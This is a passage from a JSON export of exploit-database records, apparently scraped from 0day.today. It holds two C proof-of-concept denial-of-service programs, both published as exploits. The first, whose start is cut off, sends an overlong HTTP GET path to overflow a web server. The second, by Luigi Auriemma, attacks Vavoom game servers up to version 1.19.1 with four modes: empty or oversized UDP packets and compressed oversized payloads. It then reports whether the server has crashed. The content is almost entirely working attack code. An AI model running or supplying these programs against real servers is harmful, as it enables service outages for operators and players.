printf(\"\\n\"\r\n \"Usage: %s <host> [port(%hu)]\\n\"\r\n \"\\n\"\r\n \"Note: although the bug is a buffer-overflow, I have found only a limited way\\n\"\r\n \" (something like an off-by-one) to exploit it versus the server\\n\"\r\n \" Note also that in some cases (for example where it has not been\\n\"\r\n \" configured yet or the logging function has been never enabled) the server\\n\"\r\n \" will not crash\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n seed = time(NULL);\r\n\r\n if(argc > 2) port = atoi(argv[2]);\r\n peer.sin_addr.s_addr = resolv(argv[1]);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), port);\r\n\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n\r\n printf(\"- connect...\");\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n printf(\" done\\n\");\r\n\r\n len = sprintf(buff, \"GET /\");\r\n len += create_rand_string(buff + len, BOFSZ, &seed);\r\n len += sprintf(buff + len, \" \\r\\n\\r\\n\");\r\n\r\n printf(\"- send BOF HTTP request\\n\");\r\n if(send(sd, buff, len, 0)\r\n < 0) std_err();\r\n\r\n printf(\"- wait some seconds\\n\");\r\n for(i = 3; i >= 0; i--) {\r\n printf(\"%3d\\r\", i);\r\n sleep(ONESEC);\r\n }\r\n\r\n close(sd);\r\n printf(\"- finished, check it manually\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint create_rand_string(u_char *data, int len, u_int *seed) {\r\n u_int rnd;\r\n u_char *p = data;\r\n const static u_char table[] =\r\n \"0123456789\"\r\n \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n \"abcdefghijklmnopqrstuvwxyz\";\r\n\r\n rnd = *seed;\r\n\r\n while(len--) {\r\n rnd = (rnd * 0x343FD) + 0x269EC3;\r\n rnd >>= 3;\r\n *p++ = table[rnd % (sizeof(table) - 1)];\r\n }\r\n *p = 0;\r\n\r\n *seed = rnd;\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nu_int resolv(char *host) {\r\n struct hostent *hp;\r\n u_int host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == 
INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_int *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n# 0day.today [2018-04-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6123"}, {"lastseen": "2018-04-07T23:43:30", "references": [], "description": "Exploit for unknown platform in category dos / poc", "edition": 2, "reporter": "Luigi Auriemma", "published": "2006-03-26T00:00:00", "title": "Vavoom <= 1.19.1 [Multiple Vulnerabilities] Denial of Service Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-07T23:43:30", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-03-26T00:00:00", "id": "1337DAY-ID-6116", "href": "https://0day.today/exploit/description/6116", "sourceData": "=====================================================================\r\nVavoom <= 1.19.1 [Multiple Vulnerabilities] Denial of Service Exploit\r\n=====================================================================\r\n\r\n\r\n\r\n\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <time.h>\r\n#include <zlib.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: 
error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 
10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n #define close closesocket\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <sys/param.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 26000\r\n#define BUFFSZ 8192\r\n#define MAXSZ (0x7ff - NET_HEADERSIZE) // this is the max\r\n#define BOFSZ 1040 // less than CBOFSZ and major than MAX_DATAGRAM\r\n#define CBOFSZ 0x7ff // 1200 (or less) is enough\r\n#define FLAGZ(x,y) x | (y & NETFLAG_COMPR_LEN_MASK) | ((len << 16) & NETFLAG_LENGTH_MASK)\r\n#define NICK \"\\\\class\\\\0\" \\\r\n \"\\\\color\\\\0\" \\\r\n \"\\\\name\\\\\"\r\n\r\n#define NET_HEADERSIZE 10\r\n#define MAX_DATAGRAM 1024\r\n#define MAX_INFO_STRING 1024\r\n#define MaxSize 4096\r\n\r\nenum {\r\n clc_bad,\r\n clc_nop,\r\n clc_disconnect,\r\n clc_move,\r\n clc_stringcmd,\r\n clc_player_info,\r\n};\r\n\r\n// NetHeader 
flags\r\n#define NETFLAG_COMPR_LEN_MASK\t0x000007ff\r\n#define NETFLAG_COMPR_MODE_MASK\t0x0000f800\r\n#define NETFLAG_LENGTH_MASK\t\t0x07ff0000\r\n#define NETFLAG_FLAGS_MASK\t\t0xf8000000\r\n#define NETFLAG_COMPR_NONE\t\t0x00000000\r\n#define NETFLAG_COMPR_ZIP\t\t0x00000800\r\n#define NETFLAG_EOM\t\t\t\t0x08000000\r\n#define NETFLAG_ACK\t\t\t\t0x10000000\r\n#define NETFLAG_DATA\t\t\t0x20000000\r\n#define NETFLAG_UNRELIABLE\t\t0x40000000\r\n#define NETFLAG_CTL\t\t\t\t0x80000000\r\n\r\n// Client request\r\n#define CCREQ_CONNECT\t\t\t1\r\n#define CCREQ_SERVER_INFO\t\t2\r\n\r\n// Server reply\r\n#define CCREP_ACCEPT\t\t\t11\r\n#define CCREP_REJECT\t\t\t12\r\n#define CCREP_SERVER_INFO\t\t13\r\n\r\n\r\n\r\nint info_proto(u_char *data, int len);\r\nu_short vavoom_crc(u_char *data, int len);\r\nint mycpy(u_char *dst, u_char *src);\r\nint send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err);\r\nint timeout(int sock, int sec);\r\nu_int resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nstruct sockaddr_in peer;\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n long clen;\r\n u_int seed,\r\n *flags,\r\n *seq,\r\n seqn;\r\n int sd,\r\n i,\r\n len,\r\n ulen,\r\n ver = 1,\r\n attack;\r\n u_short port = PORT,\r\n cport,\r\n *crc;\r\n u_char buff[BUFFSZ],\r\n cbof[MAXSZ],\r\n *p;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Vavoom <= 1.19.1 multiple vulnerabilities \" VER \"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <attack> <host> [port(%hu)]\\n\"\r\n \"\\n\"\r\n \"Attack:\\n\"\r\n \" 1 = socket unreachable through empty or big packet\\n\"\r\n \" 2 = decompression crash (unexploitable buffer-overflow)\\n\"\r\n \" 3 = SV_BroadcastPrintf / Serialize crash (caused by bug 2)\\n\"\r\n \" 4 = 
SV_SetUserInfo crash / Info_SetValueForKey: oversize infostring\\n\"\r\n \" (caused by bug 2)\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n attack = atoi(argv[1]);\r\n\r\n if(argc > 3) port = atoi(argv[3]);\r\n peer.sin_addr.s_addr = resolv(argv[2]);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), port);\r\n\r\n flags = (u_int *)buff;\r\n seq = (u_int *)(buff + 4);\r\n crc = (u_short *)(buff + 8);\r\n seed = time(NULL);\r\n\r\n printf(\"- query server:\\n\");\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n p = buff + 4;\r\n *p++ = CCREQ_SERVER_INFO;\r\n p += mycpy(p, \"VAVOOM\");\r\n *p++ = ver;\r\n len = p - buff;\r\n *flags = htonl(FLAGZ(NETFLAG_CTL, 0));\r\n\r\n len = send_recv(sd, buff, len, buff, sizeof(buff), 1);\r\n close(sd);\r\n ver = info_proto(buff, len);\r\n\r\n if(attack == 1) {\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n printf(\"- send zero length packet\\n\");\r\n send_recv(sd, buff, 0, buff, sizeof(buff), 0);\r\n\r\n printf(\"- send big packet\\n\");\r\n send_recv(sd, buff, MaxSize + 1, buff, sizeof(buff), 0);\r\n\r\n close(sd);\r\n goto quit;\r\n }\r\n\r\n printf(\"- start connection:\\n\");\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n printf(\"- send connection request\\n\");\r\n p = buff + 4;\r\n *p++ = CCREQ_CONNECT;\r\n p += mycpy(p, \"VAVOOM\");\r\n *p++ = ver;\r\n len = p - buff;\r\n *flags = htonl(FLAGZ(NETFLAG_CTL, 0));\r\n\r\n len = send_recv(sd, buff, len, buff, sizeof(buff), 1);\r\n\r\n if(buff[4] != CCREP_ACCEPT) {\r\n printf(\"\\nError: your connection has not been accepted\\n\\n\");\r\n exit(1);\r\n }\r\n\r\n cport = *(u_short *)(buff + 5); // I don't know why this is not in network byte order\r\n printf(\"- use server port %hu\\n\", cport);\r\n peer.sin_port = htons(cport);\r\n seqn = 0;\r\n\r\n printf(\"- send 
ack\\n\"); // useless\r\n p = buff + NET_HEADERSIZE;\r\n len = p - buff;\r\n *flags = htonl(FLAGZ(NETFLAG_ACK, 0));\r\n *seq = seqn++;\r\n *crc = htons(0);\r\n\r\n len = send_recv(sd, buff, len, buff, sizeof(buff), 1);\r\n\r\n if(attack == 2) {\r\n printf(\"- lot of compressed data\\n\");\r\n p = buff + NET_HEADERSIZE;\r\n\r\n ulen = CBOFSZ; // uncompressed size\r\n clen = MAXSZ; // compressed size (not important, just enough big)\r\n memset(cbof, 'A', ulen);\r\n compress(p, &clen, cbof, ulen);\r\n p += clen;\r\n len = p - buff;\r\n\r\n *flags = htonl(FLAGZ(NETFLAG_DATA | NETFLAG_UNRELIABLE | NETFLAG_COMPR_ZIP, ulen));\r\n *seq = seqn++;\r\n *crc = htons(vavoom_crc(buff + NET_HEADERSIZE, len - NET_HEADERSIZE));\r\n\r\n } else if(attack == 3) {\r\n printf(\"- big say string\\n\");\r\n p = buff + NET_HEADERSIZE;\r\n\r\n ulen = BOFSZ;\r\n clen = MAXSZ;\r\n *cbof = clc_stringcmd;\r\n memset(cbof + 1, 'A', ulen);\r\n memcpy(cbof + 1, \"Say \", 4);\r\n cbof[ulen - 1] = 0;\r\n compress(p, &clen, cbof, ulen);\r\n p += clen;\r\n len = p - buff;\r\n\r\n *flags = htonl(FLAGZ(NETFLAG_DATA | NETFLAG_UNRELIABLE | NETFLAG_COMPR_ZIP, ulen));\r\n *seq = seqn++;\r\n *crc = htons(vavoom_crc(buff + NET_HEADERSIZE, len - NET_HEADERSIZE));\r\n\r\n } else if(attack == 4) {\r\n printf(\"- big user info\\n\");\r\n p = buff + NET_HEADERSIZE;\r\n\r\n ulen = BOFSZ;\r\n clen = MAXSZ;\r\n *cbof = clc_player_info;\r\n memset(cbof + 1, 'A', ulen);\r\n memcpy(cbof + 1, NICK, sizeof(NICK) - 1);\r\n cbof[ulen - 1] = 0;\r\n compress(p, &clen, cbof, ulen);\r\n p += clen;\r\n len = p - buff;\r\n\r\n *flags = htonl(FLAGZ(NETFLAG_DATA | NETFLAG_UNRELIABLE | NETFLAG_COMPR_ZIP, ulen));\r\n *seq = seqn++;\r\n *crc = htons(vavoom_crc(buff + NET_HEADERSIZE, len - NET_HEADERSIZE));\r\n\r\n } else {\r\n printf(\"\\nError: wrong attack number (%d)\\n\\n\", attack);\r\n exit(1);\r\n }\r\n\r\n len = send_recv(sd, buff, len, buff, sizeof(buff), 0);\r\n if(len < 0) {\r\n printf(\"- no reply from the 
server\\n\");\r\n }\r\n\r\n close(sd);\r\n\r\nquit:\r\n printf(\"- wait some seconds\\n\");\r\n for(i = 3; i; i--) {\r\n printf(\"%d\\r\", i);\r\n sleep(ONESEC);\r\n }\r\n\r\n printf(\"- check server:\\n\");\r\n peer.sin_port = htons(port);\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n p = buff + 4;\r\n *p++ = CCREQ_SERVER_INFO;\r\n p += mycpy(p, \"VAVOOM\");\r\n *p++ = ver;\r\n len = p - buff;\r\n *flags = htonl(FLAGZ(NETFLAG_CTL, 0));\r\n\r\n if(send_recv(sd, buff, len, buff, sizeof(buff), 0) < 0) {\r\n printf(\"\\n Server IS vulnerable!!!\\n\\n\");\r\n } else {\r\n printf(\"\\n Server does not seem vulnerable\\n\\n\");\r\n }\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint info_proto(u_char *data, int len) {\r\n u_int flags;\r\n int ver;\r\n u_char cmd,\r\n *limit;\r\n\r\n limit = data + len;\r\n flags = *(u_int *)data; data += 4;\r\n cmd = *data; data++;\r\n printf(\" Hostname %s\\n\", data); data += strlen(data) + 1;\r\n printf(\" Level %s\\n\", data); data += strlen(data) + 1;\r\n printf(\" Players %hhu/%hhu\\n\", data[0], data[1]); data += 2;\r\n ver = *data; data++;\r\n printf(\" Version %d\\n\", ver);\r\n printf(\" Wads \");\r\n while(data < limit) {\r\n printf(\"%s\", data); data += strlen(data) + 1;\r\n if(!*data) break;\r\n printf(\", \");\r\n }\r\n printf(\"\\n\");\r\n\r\n return(ver);\r\n}\r\n\r\n\r\n\r\nu_short vavoom_crc(u_char *data, int len) {\r\n u_short crc;\r\n const static u_short table[] = {\r\n 0x0000,\t0x1021,\t0x2042,\t0x3063,\t0x4084,\t0x50a5,\t0x60c6,\t0x70e7,\r\n 0x8108,\t0x9129,\t0xa14a,\t0xb16b,\t0xc18c,\t0xd1ad,\t0xe1ce,\t0xf1ef,\r\n 0x1231,\t0x0210,\t0x3273,\t0x2252,\t0x52b5,\t0x4294,\t0x72f7,\t0x62d6,\r\n 0x9339,\t0x8318,\t0xb37b,\t0xa35a,\t0xd3bd,\t0xc39c,\t0xf3ff,\t0xe3de,\r\n 0x2462,\t0x3443,\t0x0420,\t0x1401,\t0x64e6,\t0x74c7,\t0x44a4,\t0x5485,\r\n 0xa56a,\t0xb54b,\t0x8528,\t0x9509,\t0xe5ee,\t0xf5cf,\t0xc5ac,\t0xd58d,\r\n 
0x3653,\t0x2672,\t0x1611,\t0x0630,\t0x76d7,\t0x66f6,\t0x5695,\t0x46b4,\r\n 0xb75b,\t0xa77a,\t0x9719,\t0x8738,\t0xf7df,\t0xe7fe,\t0xd79d,\t0xc7bc,\r\n 0x48c4,\t0x58e5,\t0x6886,\t0x78a7,\t0x0840,\t0x1861,\t0x2802,\t0x3823,\r\n 0xc9cc,\t0xd9ed,\t0xe98e,\t0xf9af,\t0x8948,\t0x9969,\t0xa90a,\t0xb92b,\r\n 0x5af5,\t0x4ad4,\t0x7ab7,\t0x6a96,\t0x1a71,\t0x0a50,\t0x3a33,\t0x2a12,\r\n 0xdbfd,\t0xcbdc,\t0xfbbf,\t0xeb9e,\t0x9b79,\t0x8b58,\t0xbb3b,\t0xab1a,\r\n 0x6ca6,\t0x7c87,\t0x4ce4,\t0x5cc5,\t0x2c22,\t0x3c03,\t0x0c60,\t0x1c41,\r\n 0xedae,\t0xfd8f,\t0xcdec,\t0xddcd,\t0xad2a,\t0xbd0b,\t0x8d68,\t0x9d49,\r\n 0x7e97,\t0x6eb6,\t0x5ed5,\t0x4ef4,\t0x3e13,\t0x2e32,\t0x1e51,\t0x0e70,\r\n 0xff9f,\t0xefbe,\t0xdfdd,\t0xcffc,\t0xbf1b,\t0xaf3a,\t0x9f59,\t0x8f78,\r\n 0x9188,\t0x81a9,\t0xb1ca,\t0xa1eb,\t0xd10c,\t0xc12d,\t0xf14e,\t0xe16f,\r\n 0x1080,\t0x00a1,\t0x30c2,\t0x20e3,\t0x5004,\t0x4025,\t0x7046,\t0x6067,\r\n 0x83b9,\t0x9398,\t0xa3fb,\t0xb3da,\t0xc33d,\t0xd31c,\t0xe37f,\t0xf35e,\r\n 0x02b1,\t0x1290,\t0x22f3,\t0x32d2,\t0x4235,\t0x5214,\t0x6277,\t0x7256,\r\n 0xb5ea,\t0xa5cb,\t0x95a8,\t0x8589,\t0xf56e,\t0xe54f,\t0xd52c,\t0xc50d,\r\n 0x34e2,\t0x24c3,\t0x14a0,\t0x0481,\t0x7466,\t0x6447,\t0x5424,\t0x4405,\r\n 0xa7db,\t0xb7fa,\t0x8799,\t0x97b8,\t0xe75f,\t0xf77e,\t0xc71d,\t0xd73c,\r\n 0x26d3,\t0x36f2,\t0x0691,\t0x16b0,\t0x6657,\t0x7676,\t0x4615,\t0x5634,\r\n 0xd94c,\t0xc96d,\t0xf90e,\t0xe92f,\t0x99c8,\t0x89e9,\t0xb98a,\t0xa9ab,\r\n 0x5844,\t0x4865,\t0x7806,\t0x6827,\t0x18c0,\t0x08e1,\t0x3882,\t0x28a3,\r\n 0xcb7d,\t0xdb5c,\t0xeb3f,\t0xfb1e,\t0x8bf9,\t0x9bd8,\t0xabbb,\t0xbb9a,\r\n 0x4a75,\t0x5a54,\t0x6a37,\t0x7a16,\t0x0af1,\t0x1ad0,\t0x2ab3,\t0x3a92,\r\n 0xfd2e,\t0xed0f,\t0xdd6c,\t0xcd4d,\t0xbdaa,\t0xad8b,\t0x9de8,\t0x8dc9,\r\n 0x7c26,\t0x6c07,\t0x5c64,\t0x4c45,\t0x3ca2,\t0x2c83,\t0x1ce0,\t0x0cc1,\r\n 0xef1f,\t0xff3e,\t0xcf5d,\t0xdf7c,\t0xaf9b,\t0xbfba,\t0x8fd9,\t0x9ff8,\r\n 0x6e17,\t0x7e36,\t0x4e55,\t0x5e74,\t0x2e93,\t0x3eb2,\t0x0ed1,\t0x1ef0\r\n };\r\n\r\n crc = 0xffff;\r\n\r\n while(len--) 
{\r\n crc = (crc << 8) ^ table[(crc >> 8) ^ *data];\r\n data++;\r\n }\r\n\r\n return(crc);\r\n}\r\n\r\n\r\n\r\nint mycpy(u_char *dst, u_char *src) {\r\n u_char *p;\r\n\r\n for(p = dst; *src; src++, p++) {\r\n *p = *src;\r\n }\r\n *p++ = 0;\r\n return(p - dst);\r\n}\r\n\r\n\r\n\r\nint send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err) {\r\n int retry,\r\n len;\r\n\r\n if(in) {\r\n for(retry = 3; retry; retry--) {\r\n if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n if(!timeout(sd, 2)) break;\r\n }\r\n\r\n if(!retry) {\r\n if(!err) return(-1);\r\n fputs(\"\\nError: socket timeout, no reply received\\n\\n\", stdout);\r\n exit(1);\r\n }\r\n } else {\r\n if(timeout(sd, 3) < 0) return(-1);\r\n }\r\n\r\n len = recvfrom(sd, out, outsz, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n return(len);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int sec) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n int err;\r\n\r\n tout.tv_sec = sec;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\r\n if(err < 0) std_err();\r\n if(!err) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu_int resolv(char *host) {\r\n struct hostent *hp;\r\n u_int host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_int *)(hp->h_addr);\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\n# 0day.today [2018-04-07] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6116"}]}}
